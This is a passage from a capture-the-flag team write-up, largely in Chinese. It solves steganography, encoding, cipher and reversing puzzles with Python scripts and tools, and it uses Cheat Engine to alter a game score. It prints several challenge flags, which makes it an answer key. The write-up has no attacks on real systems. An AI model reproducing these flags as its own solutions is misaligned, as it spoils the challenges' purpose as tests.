95.78124999999994, 99.67635234374941, 103.27384172292487, 106.3008547437495, 108.54084876295153, 109.85479999999998, 110.19481356295157, 109.60881314374947, 108.23585132292477, 106.2924995437495, 104.05164999999992, 101.81580445625055, 99.88746467707526, 98.53952285625058, 97.98855043704843, 98.37360000000002, 99.74259523704846, 102.04764125625049, 105.14971427707509, 108.83227165625068, 112.82244999999998, 116.81777634374937, 120.51577772292462, 123.64359074374954, 125.98467276295156, 127.39999999999999, 127.84167756295156, 127.35762914374943, 126.08690732292476, 124.24608354374948, 122.10805000000006, 119.97530845625052, 118.15036067707523, 116.9060988562505, 116.45909443704844, 116.9484, 118.42193923704848, 120.83181725625045, 124.03901027707529, 127.82697565625074, 131.92285000000012, 136.02416034374943, 139.8284337229246, 143.06280674374943, 145.51073676295164, 147.0332, 147.58230156295153, 147.20596514374955, 146.0432433229246, 144.3107075437494, 142.28125, 140.2573724562507, 138.54157667707528, 137.40675485625044, 137.06947843704847, 137.66879999999998, 139.25264323704855, 141.77311325625047, 145.09118627707534, 148.99031965625048, 153.1976500000002, 157.4107043437495, 161.32700972292466, 164.6737027437495, 167.23424076295166, 168.86960000000002, 169.53188556295154, 169.26902114374957, 168.22005932292495, 166.60157154374934, 164.68644999999995, 162.7771964562506, 161.1763126770754, 160.1566908562506, 159.93490243704844, 160.64999999999998, 162.3499072370484, 164.9867292562506, 168.4214422770752, 172.43750365625058, 176.7620499999999, 181.0926083437496, 185.12670572292475, 188.59147874374935, 191.2703847629515, 193.02440000000007, 193.80562956295157, 193.66199714374952, 192.7325553229249, 191.23387554374932, 189.43884999999992, 187.64998045625052, 186.16976867707535, 185.27110685625067, 185.17056643704845, 186.00719999999998, 187.8289312370484, 190.58786525625038, 194.14497827707527, 198.28372765625065, 202.73125, 207.1850723437493, 211.34272172292484, 214.93133474374943, 217.7343687629516, 219.61279999999994, 220.51873356295155, 220.50009314374952, 219.69593132292485, 218.32281954374946, 216.6536499999999, 214.9909244562505, 213.6371446770753, 212.86520285625065, 212.89167043704845, 213.85560000000004, 215.80491523704845, 218.69172125625042, 222.37699427707534, 226.64419165625074, 231.22045000000006, 235.80329634374937, 240.09025772292452, 243.8084707437495, 246.74139276295156]
x_predict=[5.0, 5.01, 5.02, 5.029999999999999, 5.040000000000001, 5.050000000000001, 5.0600000000000005, 5.07, 5.08, 5.09, 5.1, 5.109999999999999, 5.120000000000001, 5.130000000000001, 5.140000000000001, 5.15, 5.16, 5.17, 5.18, 5.1899999999999995, 5.199999999999999, 5.210000000000001, 5.220000000000001, 5.23, 5.24, 5.25, 5.26, 5.27, 5.279999999999999, 5.290000000000001, 5.300000000000001, 5.3100000000000005, 5.32, 5.33, 5.34, 5.35, 5.359999999999999, 5.370000000000001, 5.380000000000001, 5.390000000000001, 5.4, 5.41, 5.42, 5.43, 5.4399999999999995, 5.449999999999999, 5.460000000000001, 5.470000000000001, 5.48, 5.49, 5.5, 5.51, 5.52, 5.529999999999999, 5.540000000000001, 5.550000000000001, 5.5600000000000005, 5.57, 5.58, 5.59, 5.6, 5.609999999999999, 5.620000000000001, 5.630000000000001, 5.640000000000001, 5.65, 5.66, 5.67, 5.68, 5.6899999999999995, 5.700000000000001, 5.710000000000001, 5.720000000000001, 5.73, 5.74, 5.75, 5.76, 5.77, 5.779999999999999, 5.790000000000001, 5.800000000000001, 5.8100000000000005, 5.82, 5.83, 5.84, 5.85, 5.859999999999999, 5.870000000000001, 5.880000000000001, 5.890000000000001, 5.9, 5.91, 5.92, 5.93, 5.9399999999999995, 5.950000000000001, 5.960000000000001, 5.970000000000001, 5.98, 5.99]
main()

poisonous from:(Astrageldon)

折叠框的标题

import torch

model = torch.load(r"resnet_mwm_new.pth",map_location=torch.device('cpu'))
m = model.state_dict()

# Method 1
for name, parameters in model.named_parameters():
    print(name)
    t = list(torch.flatten(m[name]))
    a = [argmin([abs(x-y) for x in t]) for y in tar]
    if a[3]-a[2]==a[2]-a[1]==a[1]-a[0]==1:
        print(f"""=== Found ===
{name}
=============""")
        break



# Method 2
with open(r"D:\_Temp\1111.txt","a") as f:
    for name, parameters in model.named_parameters():
        print(name, ';', parameters.size())
        f.write(f'\n\n\n{"="*20}\n{name}\n{"="*20}\n\n\n'+str(m[name]))



'''
target=[ord(x)/256 for x in 'copy']
print(target)
#[0.38671875, 0.43359375, 0.4375, 0.47265625]
'''

'''
For method 1:



For method 2:

Search for 3.867

And you'll notice it's "layer2.0.downsample.0.weight"

F = lambda y:''.join([chr(int(x*256+0.5)%256) for x in torch.flatten(m[y])])
print(F("layer2.0.downsample.0.weight"))
'''

Misc

基于chatgpt的lora调制 from:(Astrageldon)

exp

import numpy as np
import wave
import struct
import pyaudio

fc = 2400#载波频率
bw = 200#带宽

sf = 10#扩频因子
fs = 48000#采样率
duration = 5#时长（秒)

chunk_size = 1024#帧大小
threshold = 0.2#门限值

def generate_signal( text) :
    bits = ''.join(format(ord(i),'08b') for i in text)#扩频
    bits_spread = ''.join([bit*sf for bit in bits])#调制
    t =np.arange(0,duration,1/fs)
    signal_i = np.sin( 2*np.pi*fc*t)
    signal_q = np.sin( 2*np.pi*(fc+bw)*t)
    signal_rf = signal_i *[int(bit) for bit in bits_spread] + signal_q * [1-int(bit) for bit in bits_spread]
    return signal_rf

def save_wav(signal_rf, filename) :
    nframes = len(signal_rf)
    comp_type ="NONE"
    comp_name = "not compressed"
    nchannels = 2
    sampwidth= 2
    framerate = int(fs)
    wav_file = wave.open(filename, 'w')
    wav_file.setparams( ( nchannels, sampwidth, framerate, nframes, comp_type, comp_name))
    for s in signal_rf:
        wav_file.writeframes( struct.pack( ' i ', int(s*32767/2)))
    wav_file.writeframes(struct.pack( 'i', int(s*32767/2)))
    wav_file.close()

def read_wav( filename) :
    wav_file = wave.open(filename, 'rb')
    nframes = wav_file.getnframes()
    signal_rf = np.zeros(nframes)
    for i in range(nframes ) :
        data = wav_file.readframes(1)
        signal_rf[i] = struct.unpack( 'i', data)[0]
    wav_file.close()
    return signal_rf


#####


def demodulate_signal(signal_rf):
    t =np.arange(0,duration,1/fs)
    signal_i = np.sin( 2*np.pi*fc*t)*32767/2
    signal_q = np.sin( 2*np.pi*(fc+bw)*t)*32767/2
    bits_spread = ['1' if abs(signal_i[i] - signal_rf[i]) < abs(signal_q[i] - signal_rf[i]) else '0' for i in range(len(signal_rf))]
    assert not len(bits_spread)%sf
    bits = ''.join(bits_spread[::sf])
    assert not len(bits)%8
    return ''.join([chr(int(bits[i:i+8],2)) for i in range(0,len(bits),8)])

b=read_wav(r"output.wav")
c=demodulate_signal(b)

# Enumeration start

print('===== Enum Table =====')
print('\n'.join([' '.join([t]+[chr(ord(t)^(1<<i)) for i in range(8) if ord(t)^(1<<i) in range(32,127)]) for t in c]))
print('======================')

# flag{A1_Ch4n_l0Ok5_a_l1ttl3_adoRkab1e}

# adorkable == adorable + dorky

NOT 2048 from:(Astrageldon)

Install a Ti-89
/_Data/TI-Emulator.exe

Import .89z file and enter “t2048[]” in your calculator.

Search for your score in byte value using Cheat Engine.
and you’re going to modify the value byte by byte backwards like:

0254edc5 83
0254edc4 191
0254edc3 1

That’s hex for 114515.

Then feel free to mess around with your keyboard until your game fails :)
(Usually that’ll take a long time and my largest number always reaches 256)

在哪里呢 from:(Astrageldon)

pngcheck.exe -v SPACE!.png
or
tweakpng https://entropymine.com/jason/tweakpng/
By checking the hex of the picture, you can discover two corrupted IDAT symbols “IOAT”.
Repair them.
Restore original width and height by brute-force enumeration:

import os
import binascii
import struct

crc0 = 0xa59d0265

crcbp = open("xxx.png", "rb").read()
for i in range(3414,3415):
    for j in range(4600,8000):
        data = crcbp[12:16] + \
            struct.pack('>i', i)+struct.pack('>i', j)+crcbp[24:29]
        crc32 = binascii.crc32(data) & 0xffffffff
        if(crc32 == crc0):
            print(i, j)
            print('hex:', hex(i), hex(j))

Stegsolve, LSB, base64, binary pattern, Rar file with password
pwd is in the restored picture
flag{n1c9_ch@l1enge_i5n’t_1t}
nah it isn’t 😡

国庆快乐

http://z.duoluosb.com/

不想做作业

阴阳怪气加密（一把梭）

``就这 ¿ 替换为0, 不会吧？替换为1`

每9个bit合成一个byte（丢弃最高位）

bytes拼接一下decode一下即可

尊嘟假嘟

xlsm但是加密，使用winrar或者7z打开，打开xl>vbaProject.bin>VBA, 打开Sheet1得到flag

zys的套题生成器

好玩

先把输出读取一下或者eval一下

符合base64，解密一下

PNG文件头，写入本地观察

全是乱的颜色，所以是数据直接编码为rgb，解密脚本如下

def rev_rgbnumber(path:str):
    image = Image.open(path)
    out = []
    for y in range(image.height):
        for x in range(image.width):
            (r,g,b) = image.getpixel((x, y))
            out.append(r)
            out.append(g)
            out.append(b)
    return bytes(out)

解密后还是PNG头，写入文件

可见图像色彩抽风，猜测为msb，解密脚本如下

def rev_msb(path:str) :
    image = Image.open(path)
    binary_secret=''
    for y in range(image.height):
        for x in range(image.width):
            pixel:List[int] = list(image.getpixel((x, y)))
            for value in pixel:
                binary_secret+=str(value>>7)
    return long_to_bytes(int(binary_secret,2))

得到flagSpirit{zysgmzb_boom_b00m_bOOm!}

## ⭕⭕❌❌

⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌

首先将图片切割，然后分别识别每一个图片，最后转为bytes

~~OPEN CV真好玩~~

exp

import pytesseract
import cv2
from tqdm import tqdm 
import itertools
from PIL import Image
import numpy as np

# 读取原始图像
img = cv2.imread('out2.png')
img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
# 指定切割后的小块大小
tile_size = 20

# 获取图像的行数和列数
rows, cols = img.shape[:2]
XXOO = ""
print('rows',rows,'cols',cols)
O = []
X = []

# n=0
# 切割图像并保存小块
def for_each_tile(callback):
    for x,y in tqdm(itertools.product(range(0,rows,tile_size),range(0,cols,tile_size)),total=(rows//tile_size)*(cols//tile_size),unit="photo",ncols=100):
        # 计算当前小块的位置和大小
        #x, y = c, r
        # 从原始图像中切割出小块
        # print(f"{x},{y}")
        tile = img[x:x+tile_size,y:y+tile_size]
        callback(tile)
        
  
def check_image(img):
    global XXOO
    # gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    gray = img
    max_val_X=0.0
    max_val_O=0.0
    for o in O:
        for x in X:
            # 计算图片a和X[i]的相似度
            result_X = cv2.matchTemplate(gray, x, cv2.TM_CCOEFF_NORMED)
            max_val_X = max(max_val_X,np.max(result_X))
        for o in O:
            # 计算图片a和O[i]的相似度
            result_O = cv2.matchTemplate(gray, o, cv2.TM_CCOEFF_NORMED)
            max_val_O = max(max_val_O,np.max(result_O))

    if max_val_X < 0.9 and max_val_O < 0.9 and abs(max_val_X-max_val_O) < 0.4:
        print({"X":max_val_X,"O":max_val_O})
        cv2.imshow("CV Image",img)
        key = cv2.waitKey(0)  # 等待按键按下
        while key!=111 and key!=120:
            key = cv2.waitKey(0)
        cv2.destroyAllWindows()  # 关闭窗口
        if key == 120:
            max_val_O=0
            max_val_X=1
            XXOO+="1"
            X.append(gray)
        if key == 111:
            max_val_O=1
            max_val_X=0
            XXOO+="0"
            O.append(gray)
    else:
        if max_val_O > max_val_X:
            XXOO+="0"
        else:
            XXOO+="1"
            
       
import os
for filename in os.listdir('X'):
    os.remove(os.path.join('X', filename))
for filename in os.listdir('O'):
    os.remove(os.path.join('O', filename))
for i, o in enumerate(O):
    cv2.imwrite(f"./O/{i}.jpg", o)
for i, x in enumerate(X):
    cv2.imwrite(f"./X/{i}.jpg", x)
    
    
    
bits = int(XXOO,2).to_bytes(length=(len(XXOO)+7)//8,byteorder="big")
print(bits.decode(errors='ignore'))

但是其实是一个压缩文件

Long.py

先把源文件过滤干净，然后写点b正则匹配一下

然后在数字发生不连续的时候打印一下（同时数字的范围在[0,127]）

with open('./88w.py', 'r') as f:
    lines = f.readlines()

flag = ''
count = 1
k = 0
for i in range(8, len(lines), 3):
    if f"flag[{k}]" in lines[i]:
        if f"== {count}:" in lines[i]:
            count += 1
        else:
            flag += chr(count)
            count = 1
            k += 1
print(flag)
# Credit: AppleTree

弄脏的pdf

一把梭

微信扫一扫

baby qrcode - stage 1

pyzbar库扫一扫

Crypto

Base_Game

~~下辈子我一定好好学离散数学~~

源码


from secret import flag

for i in range(0,10):
    temp = random.randint(0,2)
    if temp == 0:
        flag=base64.b64encode(flag)
    elif temp == 1:
        flag=base64.b32encode(flag)
    elif temp == 2:
        flag=base64.b16encode(flag)

print(flag)

'''
太他妈长了我不写了
'''

是个套娃编码

我的想法是

base16不能解码base32/64

base32不能解码base64

所以从base16开始测试，一直往上面走

代码

import base64
enc = b'I5KTERCLJ5BFQR2BGJKEKTSDIVDVCMSUI5GUUWCHIUZFISKOJJKUOUK2IREVEUSWI5ETERCNJZBFOR2NGNCEWTSCK5EU2MSUIVHEGRSHKJBVIS2OJJKEORK2KRGU4SSWI5KTIRCPJVBFKSKZGJKEKTSCKZDU2WKEJ5HFUVSHKEZUKRKOJJJUOUSBKRGU4SSXJFEVUVCLJZFFMR2VGJCEWTSCKVEVKMSFJNHFEVSHLJBFIS2OKJKEOWJSKREU4SSZI42FSRCJKJFFKSKRGJKEWTK2KJDU2M2EJNHEEVSIIEZVIQKOINDUOVK2IREU4SSUI5ATGVKDJZFFKR2VGRCE6TKCKZDUSM2EJNHFGQ2HJUZFIT2NJJLEOUJSKREU4QSTI5JEGVCNJZFFOSKRGJCUWTK2K5DVKMSEJVIVUVSHJEZEKS2OINCUOUJSKRDU2SSUI5MTEVCLJZFFSRZULFCESUSKKZDVSMSEJNGVUUKHGQ2EIS2OIJLEQQJTKRAU4S2CI5MTEVCNKFJFIR2VGJKEWTSKKVDVKNCEJ5GUEVKJKUZUIS2OKNCEOUJTIRDU4USWI5ITGRKJJZNFCR2SINKESUSCKVDVKWSUJNHEEVSHKUZVIS2PIJMEOQJSIVGU4SSTI5ITEVCHJVFFIR2VGJKESTSKLFDTIWKEJNGVEV2HKUZUKRKNLJNEOVJSKRFU4QSWI5ITERCFJZBUMR2ZGJKE2UK2K5EU2WSUJVHEUVKHLJBEIS2NKJLEOSJTIRFU4SSWI5GVSVCHJZJFMR2RGJKFCTS2KFDVEQ2UJVGUUV2JJFNFIQKOLJMUOVJSIRFU6QSYI5ATERKLJZJFMR22IJCEOTSKKZDVKMSUJFHEUVKHKJBVISKSJJLUOVJTIVDU4QSWI42DGVCLJZBFMRZUGNKECTSDIZDVEQ2EJNHEUVCHKUZEIS2OJJJUOVJUIRHU2QSVJFMTEVCFJZBFOR2RGNCEOTSCKZDVCMSUKFHFUUKHKUZUITKOJJLUSSK2KRJU4QSWI5KTERCLJZBFKR2ZGJCUWTSSKZDVUQSUJNHFEVCHLEZFISKOKNCEOVK2IREVESSVJFIVUVCBJVNFER2NGNCEWTSSKZEECM2UIFHEGRSHLEZFITKRKJKEOQJTKRIU4SSVI5KTIRCPJVBFMR2ZGNCEWTSTINDU2MSUJFHEUVSHKUZFIUKOKJMUOUSDKRGU4SSXJFGTEVCNJVNFOR2VGJCEOTKKKZDUSMSFJNHEGRKHKUZFIR2NJJKEOWJTIRBU2WSUI42FSRCJKJJFMR2JGJCEWTK2KFDTKQKUJNHEEVSIIEZVIQKOJJLUOWJSKRGVCUSUJBCTEVCLJZFFKR2VGJCESTSSKVEVKM2EJNHFGQ2HJVMVIR2OKJLEOUJSKRIU4WSRI5JEGVCNJZFFMR2VLJKEGTK2K5DVKM2EJNHUEWCHIEZEKTKOKJJEOWSCIRDU2QSYI42DEVCJJZJUGR2VLJCESUKKK5DVKM2FIVGVUVSHKUZFIS2OJJLEQQJTIRIU4Q2GI5MTEVCNKFNFMR2ZLJKE2TSKKVDVUQSUJNGVEVKJKUZEKSKOIJLEOTKZKRDU4USWI5MTEVCRJZNFCR2SIRCEWTSSKVDVKWSUINGVUVKHKUZEIS2PIJMEOQJSKRGU4USWI5NEERCHJZFFQR2FGJKESTSKLFDTIWKEJFJEUV2HKUZUKRKNLJJEOTJTIRFU4QSXJFETEVCFJZFFGR2ZGJKE2UKSKRDUKWSUJVHEUVSHKUZEISKNKJKUSWJTIRBU4U2DI5GVSRCPJZNFMR2RGNCUKTSKKNDVKWSEJVHEUV2JJFNFIS2OJJLEOVJSKRFU6QSXJBATERKLJZJFMR22IJKEWTSSKRDVSMSUJFHFGRKHGRMUISKSJJKUSUJSIRFU2WSSI5GTGRCLJ5FFIR2NGNKECTSDI5DVKM2EJFHEUVCHIEZVIU2OJJKUOVJUIRHU2QSWI5ETGRCLJZJUGR2NLFKEOTSSKZDVCMSUJFHEEV2HKJBVITKOJJLUSSJTIVDU2WSXI5KTERCNKFNFMR2JGJCUWTSSKVDU2WKEI5GUUVCHLEZFIS2OJJMUONCZIREVEUSXI5CTGRKFJVNFCRZUGNKEWTSCK5EUSMSUIVHEEV2HLEZFITKRKJKEOVJSIRFU4SSVI5KTERCLJVJFKSKVGNCEWTSTIRDVKM2EI5HFEVSHKEZUKR2OJJJUOUSDKREVEQSWI5KVUVCDJVNFOR2VGJCEWT2CLBDUCMSFJVHEUV2HKEZFIR2NIJMEONBSKREU4SSZI42FSRCLJVJFOR2VGNCUKTK2KJDTIWKUJNHEEVSHKEZEIRKOINDUOVK2IREU4SSXJFGVUVCNJZFFKR22IJCEWTKSKZDUSMSFJFHEUVSHJVMVIR2OKJLEOUJSKRIU4WSRI5JEIRCLJZJFKR2VLJKECTS2LBDVKMSEJNHUEWCHIEZUKQ2OKJLEOWSCIRDU4SSVI5KTEVCJJZFFKR2VGNCESUSKK5DVKM2FI5HEUV2HJUZUIS2OIJLUSSJSKRCU4Q2GI5JEGRCLJZFFIR2FLJKE2TSKKVDVKNCEJ5GUEVKJLEZFITKOIJLEOTKZIRDU2QSWI5ITEVCRJZNFCR2VLJCESUSCKVDVKWSUINHFUUSHKUZEIS2OIJKUOWJSIVGU4SSTI5ITEVCLJZJFIR2ZGJKESTSTIRDVKWSEJFJEUVKJKFNFIQKNLJJEOTJTIRFU4SSWJBATGVCBJZBUOR2VGNCESTSKKRDUCM2UKFHEUVKHKU2EIT2NIJKUSVJTIRFU4U2DI5GTEVCLJZFFMR2RGJKESTSCK5DVEQ2UJVHEUV2JJUZFITKNLJLUOVJSIRFU6QSYI5ATERKLJZBUKR2VGJKEOTKKKRDVSMSUKNGVUVCHGRMUISKSKJLEOSJSIRGU4QSWI42DGVCLJZBFMSCBGNKECTSDIZDVSMSUJVIVEVCHKUZFIS2OJJKUOVJUIRHU2QSVJFKTGRCLJZJUIR2RGNCEOTSSKZDVCM2FI5HEUU2HKJBVISKSIJLUSSK2KRBU2WSXI5KTEVCLJZBFKR2JGJCU2TSKKNDVCMSUI5GUEWCIIEZFISKOJJMUONCZIREVCSSXI5KTGRKFJVNFMR2RGJKEWTSKKZEECM2UIFHEGRSHLEZFITKRLJKUOWK2KRGU4SSVI5NEEVCLJVJFKSKVGJCUSTSCKZDU2WKUI5HFEV2HIVNFIR2OLJIUOUSDKRGU4SSXJFEVUVCBJZNFSR2VGJCEWT2CLBDUCMSUIVHEGRKHKEZFIR2NJJKEOWJSKREU4SSVI5IVURCJKJFFOR2VGNCUOTSKK5DU2M2EJNHEEV2JJEZFIRKOJJJUOUSDIREU4SSUI5CVUVCNJZFFOR2VGRCE6TKCKZDUCMSUJVHEEVSHJVMUIT2PIJLEOUJTIVCU4SSTI5ITGRCNJZFFOSKJLJKEWTSKKZDVKMSEJNHUEV2IIEZEKS2OKJLEOWSCKREU4SSYI42DEVCJJZFFQRZULFCESUSKKVEVCMSUJNGVUUSHJUZUIS2NLJLEQQJTKRAU4Q2HI5KVURCJJZJFKR2ZLJKEWTSKKVDVKNCEJ5GUEVSHLEZUIS2OKNBUOTJUKREU4SSWI5ITEVCJJZBFOR2SINKE2TSKK5EUSMSUJVGVUV2HKUZEITKRLJLEOSJSIVFU4Q2FI5KTEVCHJVFFIR2ZGJKEWTSKLFDTIWKEJFJEUV2HKUZUKRKNLJIUONBUIRFU4QSWJBATGVCBJZFFOR2ZGJKE2UKSKRDVKMSEJNHEUVKHKUZEIS2OKJKUSVJTIRFU4U2EI5KTGRCHJZJFMR2RGJKE6TS2KFDVEQ2UJFJEEVKHKVNFIS2OIJLEOVJSIRFU6QSYI5ATERKNJZFFGR2RGJKEOTKCLBEECMSUJFHEUWKHGRMUIS2NKJLUOVJTIVCU2WS2I5KTEVCLJZBFMR2RGJCE2TSDIZDVSMSUJVIVUV2JJVNFITKOJJKUOWSCKRFU2USVJFKTERKJJZBFMR2NLFKEOTSSKZDVCMSUKFHFUUKHKJBVITKNJJLUSSK2KRAU4WSYI5KTERCNKFJFMR2JGJCUGTSSKZDVUQSEI5HEUVKHKUZFISKOJJKUOUSBKREVESSXI5KTGRKFJVNFER2NGNCEWTSCK5EUSMSUIVHEGRSHKJBUIS2OJJKEORK2KRGU4SSYI5KTIRCPJVBFKSKZGJKEKTSCK5DVCM2EI5HEUVSHKEZFIUKOLJIUOUSDKRGU4SSXJFEVUVCDJVNFOR2VGJCEWTSCKVDUSMSFJNHFEVSHLJBEIR2NJJKEOWJSKREU4U2DI5KVURCJKJFFKSKRLJKECTK2KJDU2M2EJNHEUVSHKEZEIRKOINDEOWKZKRGVCUSUI5ATGVCPJZFFKR2VGRCE6TKCKZEUKM2EJNHFGQ2HJUZFISKOJJLEOVJSKRIU4USZI5JEGVCNJZFFOSKNGJCE2TK2K5DVKMSEJVJEUWCHIEZEKS2OINCUOVJSKRDU2SSUI5MTGRCDJVNFIRZULFCESUSSKZDVSMSEJNGVUUSHJUZEIS2OIJLEQQJTKRAU4SSXI5MTEVCNKFJFIR2FLJKE2TSKKVDVKMSEJFHFEVKJKUZUIS2OKNCUONBSIRDU4USWI5ITGRKFJZFFGR2VLJCE2TSKKZDVKWSUINGVUV2HKUZUIS2PIJMEOQJSIVGU4USSI5NEERCHJVBFQRZUGJKESTSTINDVKWSEJFIUUV2HKUZUKRKNLJLEOVJSKRFU4QSWI5ITERCFJZBUMR2ZGJKE2UK2KVDVKM2UJ5HEUVKHKUZVIT2NIJKUSVJSIVEU4SSWI5GVSVCHJZJFMR2NGJKFCTS2KFDVERCEJNGVEVKHLEZEITKNLJLEOVJSIRFU6QSYI5ATEVCNJZJFMR22IJCEOTKKKRDVSMSUJFHEUVKHKFNEISKSJJLUOVJTIVEU4WSVI5GTGRCLJZBFOSKNGJKEKTSDIZDVEQ2EJNHEUVCHIVNFITKOJJKUOVJUIRHU2QSVJFKTGRCDJZJUGR2NLFCE6T2CKZDVCMSUKFHFUUKHKUZUITKOJJLUSSK2KRBU2WSXI5KTERCLJZBFKR2JGJCUWTSSKZDVUQSUJNHFEVCHLEZFISKOKNCUONCZIREVESSXI5KTGRKFJVNFER2NGNCEWTK2KZEECM2UIFHEGR2HKUZUISKOJJKEOQJTKVBU4SSVI5KTIRCPJVBFMR2JGJCUSTSCKZDU2MSUJFHEUVSHKEZFISKOIJJUOUSEIRFU2USVI5MTERCNJVNFOR2VGJCE2UK2KZDUSMSFJNHEGRSHKUZFIR2NJJKEOWJSKRFU4SSZI42FSRCJKJJFOR2FGNCUKTK2KFDTIM2UJNHEEV2JJEZFIRKOJNBEOWJSKRGVCUSUI5CVUVCNJZFFKR2VGRCE6TKCKVEVKM2EJNHFGRCHKEZUIR2OKJLEOUJTIVCU4SSTI5JEGVCJKJBFMR2VLJKEGTK2K5DVKWSEJNHUEWCHIEZEKTKOJJJUOUJSKRDU2QSUI5CTEVCJJZFFSRZULFCEWTSSK5DVKM2FIVGVUVSHGRMVIS2OIJLEOUJSIRCU4Q2HI5KVURCJJZFFMR2ZLJKE2TSKKVDVUQSEJNGVEVKJKUZEKSKOIJLEOTKZKRDU4USWI5KTEVCRJZNFCR2SINKEWTSSKVDVKWSUINGVUV2HKUZEIS2PIJMEOQJSIVFU4USWI5NEERCHJZFFKR2VGJKESTSKLFDTIWKEJFJEUV2HKUZUKRKNLJJEOTJTIRFU4QSWI42DGVCBJZBUMR2SINCESTSKKRDVKMSEJNHEUVCHKU2EIT2NIJKUSWJSKRCU4QSXI5ITGRCHJZBFMR2RGJKFCTS2KFDVKWSEJVHEUV2JJFNFIQ2NLJLUOVJSIRFU4QSVI5MTERKLJZJFMR22IJKE2UK2KRDVSMSUJFHFGQ2HKVNEIS2NKJKUSUJSIRFU2WSSI5GTGRCLJZJFMSCBGNKECTSDI5DVKWSEJFHEUVCHIEZVIUKOJJKUOVJUIRHU2QSVJFKTGRCLJZJUGR2NGJKEWTSKKZDVCMSUJFHEUU2HKJBVITKOJJLUSTJSIRFU4WSYI5KTERCNKFNFMR2JGJCUWTSDIVDVKMSUI5GUUVCHLEZFIR2OJJMUONCZIREVEUSWI5ETERCLJVNFCRZUGNKEWTSCKZEECM2UIFHEUU2HLEZFITKRKJKEOVJSKRFU4SSVI5KTERCJJZJFKSKVGNCEWTSTINDVKM2EI5HFEVSHKEZUKR2OJJJUOUSDKREVEQSXJFEVUVCDJVNFOR2VGNCEWT2CLBDUCMSFJNHFEVSHLJBEIR2NIJMEQQJSKREU4SSZI42FSRCNKFFFOR2VGNCUKTK2KZDVCMSUJNHEUVSHKEZEITKOINDEOWJSKRGVCWSWI5MVUVCNJZFFKR2VGNKE6TKCKVEVKMSFJFHEEVSHJUZFISKOJJLEOTJSKRIU4WSRI5JEIRCLJZJFKR2VLJKECTS2LJDVKMSEJNHUEWCHIEZFIRKOKJLEOWSCIRDU4SSWI5KTEVCJJZFFSRZULFCESUSKK5DVKM2FI5HFGRCHJUZUIS2OIJLUSTJSKRCU4Q2GI5JEGRCJJZFFIR2FLJKE2TSKKZDVKNCEJ5GUEVKJLEZFITKOIJLEOTKZIRHU4WSWI5ITGRKFJZFFGR2RGNCE2TSKK5EUSWSUJNHEEVSHKUZFIS2PIJLUQQJSIVFU4USWI5NEEVCJJZJFIR2ZGJKESTK2KJDVKWSEJFJEUVKJKEZEIS2NLJJEOTJTIRFU4WSWJBATGVCBJZBUOR2VLJCESTSKKRDUKWSUJVHEUVKHKU2EIT2NIJLEOWJTIRFU4U2DI5GVSVCJJZFFMR2RGJKESTSCKNDVERCEJNGVEVKHKUZFITKNLJLUOVJSIRFU6QSYI5ATERKLJZBUKR2VLFKEOUSCKREVCPJ5HU6T2PI='
rec = enc
for i in range(0,10):
    try:
        rec = base64.b16decode(rec)
    except:
        try:
            rec = base64.b32decode(rec)
        except:
            try:
                rec = base64.b64decode(rec)
            except:
                pass
print(rec)
# Spirit{Ez_Base_G4me_f0r_S1gn1n_Enj0y_h4ck1ng#20230513}

ezStream

~~eznm~~

看hint尝试得到题中数列在mod 256意义下的周期

很重要奥，一会儿要用

先看源码

源码

from secret import flag
from Crypto.Util.number import *

key = [int.from_bytes(b"SpiritGame2023!","big"),int.from_bytes(b"Hacking_for_fun","big")]

def gen_key(i):
    if i == 0:
        return key[0]
    elif i == 1:
        return key[1]
    else:
        return (gen_key(i-2)*9+gen_key(i-1)*2)

ct = []
for i in range(len(flag)):
    noise = gen_key(i**6)%256
    ct.append(ord(flag[i])^noise)
print("ct =",ct)

#ct = [114, 30, 136, 212, 72, 226, 154, 105, 68, 65, 146, 94, 64, 55, 141, 209, 70, 43, 213, 25, 85, 158, 132, 44, 18, 161, 146, 230, 76, 3, 133, 207, 88, 13, 209, 213, 19, 103, 156]

先给他来点B动态规划优化

源码

memo = {}
def gen_key(i):
    if i in memo:
        return memo[i]
    if i == 0:
        memo[0] = key[0]
    elif i == 1:
        memo[1] = key[1]
    else:
        if not memo.get(i-2):
            gen_key(i-2)
        if not memo.get(i-1):
            gen_key(i-1)
        memo.setdefault(i,(memo[i-2]*9+memo[i-1]*2))
    return memo[i]

他说这个有周期，那好啊，咱们猜个256

修改函数(改参数也可以，我选择改参数)

然后反向异或即可

final

# from Crypto.Util.number import

key = [int.from_bytes(b"SpiritGame2023!", "big"),
       int.from_bytes(b"Hacking_for_fun", "big")]
memo: 'dict[int,int]' = {}


def gen_key(i: 'int') -> (int):
    if i in memo:
        return memo[i]
    if i == 0:
        memo[0] = key[0]
    elif i == 1:
        memo[1] = key[1]
    else:
        if not memo.get(i-2):
            gen_key(i-2)
        if not memo.get(i-1):
            gen_key(i-1)
        memo.setdefault(i, (memo[i-2]*9+memo[i-1]*2))
    return memo[i]


ct2 = [114, 30, 136, 212, 72, 226, 154, 105, 68, 65, 146, 94, 64, 55, 141, 209, 70, 43, 213,
       25, 85, 158, 132, 44, 18, 161, 146, 230, 76, 3, 133, 207, 88, 13, 209, 213, 19, 103, 156]
ct: 'list[str]' = []

for i in (range(len(ct2))):
    noise = gen_key(i**6 % 256) % 256
    c = chr((ct2[i]) ^ noise)
    ct.append(c)
print("".join(ct))

ezCrypto

分别打印原始和加密内容,发现ascii码变化为原始值+当前索引%5

反向操作就好

cryptoSign

a * q ^ (index) % n

先从0 - 114514，测试对于a0=338473，循环36次后是否a==519563

然后从0 - 114514 测试是否 a * q ^ (31) % n == 338473 and a * q ^ (67) % n == 519563

Reverse

Medium Pyc from:(Astrageldon)

pyinstxtractor fast.exe

Magic Header:
61 0D 0D 0A 00 00 00 00 10 17 CA 64 09 0C 00 00

.\pycdas .\fast.pyc

Everywhere from:(Astrageldon)

折叠框的标题

"""
from idc_bc695 import *
ea=0x404140
y=[Byte(ea+x) for x in range(66)]
print(y)
"""

def restore():
    global enc, dec, check, xor1, xor2
    enc = list(b'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\x00')
    dec = list(b'0123456789+/=abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\x00')
